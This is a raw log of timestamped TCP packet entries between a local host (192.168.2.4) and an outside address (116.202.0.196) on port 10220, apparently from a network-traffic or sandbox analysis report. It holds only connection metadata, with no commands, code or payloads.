                                                                                                                                                                      Jan 12, 2024 06:48:15.827183962 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.827234983 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.827255011 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.827312946 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.827342033 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.827394009 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.827420950 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.827480078 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.827505112 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.827557087 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.827586889 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.827665091 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.827675104 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.827743053 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.827750921 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.827821970 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.827862024 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.827888966 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.827915907 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.827970982 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.828025103 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.828073025 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.828131914 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.828150988 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.828201056 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.828654051 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.828706980 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.828739882 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.828804016 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.828943968 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.828994989 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829014063 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829047918 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829066992 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829101086 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829101086 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829149961 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829153061 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829202890 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829235077 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829253912 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829303980 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829318047 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829401970 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829447985 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829484940 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829489946 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829535007 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829535961 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829597950 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829616070 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829649925 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829652071 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829701900 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829718113 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829735994 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829785109 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829813004 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829879045 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829909086 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829937935 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.829962969 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.829996109 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830014944 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830063105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830128908 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830157042 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830224037 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830276012 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830310106 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830368996 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830399990 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830461025 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830506086 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830533981 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830557108 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830605030 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830610991 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830672979 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830673933 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830707073 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830725908 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830760002 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830777884 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830811024 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830849886 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830868959 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830874920 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830923080 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.830957890 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.830986977 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831011057 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831062078 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831067085 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831115961 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831126928 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831157923 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831222057 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831233978 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831290960 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831326962 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831346989 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831357002 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831402063 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831461906 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831465960 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831496954 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831521988 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831545115 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831552029 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831597090 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831608057 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831639051 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831650019 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831703901 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831712008 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831722975 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831753969 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831783056 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831790924 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831835985 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831845045 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831878901 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.831907034 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.831969023 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832010031 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832017899 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832029104 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832065105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832066059 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832115889 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832124949 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832155943 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832168102 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832201958 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832226038 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832252979 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832261086 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832307100 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832319975 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832324982 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832371950 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832400084 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832406998 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832458019 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832494974 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832521915 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832535028 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832567930 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832572937 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832621098 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832645893 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832678080 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832715034 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832735062 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832746029 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832784891 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832842112 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832899094 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832940102 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832940102 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.832942009 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832974911 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.832974911 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833014965 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833023071 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833048105 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833076000 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833082914 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833133936 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833168030 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833216906 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833268881 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833318949 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833353043 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833417892 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833434105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833483934 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833511114 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833560944 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833595037 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833676100 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833713055 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833720922 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833729982 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833779097 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833786964 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833805084 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833853960 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833864927 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833935976 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833940983 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.833954096 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.833997965 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834044933 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834093094 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834171057 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834223032 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834249020 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834296942 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834327936 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834378958 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834398031 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834455013 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834462881 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834523916 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834537029 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834569931 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834605932 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834626913 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834638119 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834683895 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834734917 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834736109 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834805012 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834805965 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834877014 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.834877968 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834937096 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.834960938 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835019112 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835041046 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835095882 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835097075 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835139036 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835160017 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835201979 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835220098 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835266113 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835268021 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835320950 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835340023 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835372925 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835385084 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835445881 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835479021 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835529089 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835546970 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835618019 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835669041 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835701942 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835763931 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835781097 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835809946 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835827112 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835915089 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.835963964 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.835988998 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836050987 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836055040 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836100101 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836149931 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836174965 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836246014 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836246014 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836299896 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836313009 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836371899 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836379051 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836425066 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836457014 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836508036 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836532116 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836582899 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836595058 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836646080 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836684942 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836714983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836740017 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836771965 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836834908 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836859941 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836934090 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836986065 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837018013 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837071896 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837084055 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837151051 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837177038 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837205887 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837238073 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837317944 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837368011 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837380886 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837420940 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837450027 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837524891 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837577105 CET4975110220192.168.2.4116.202.0.196
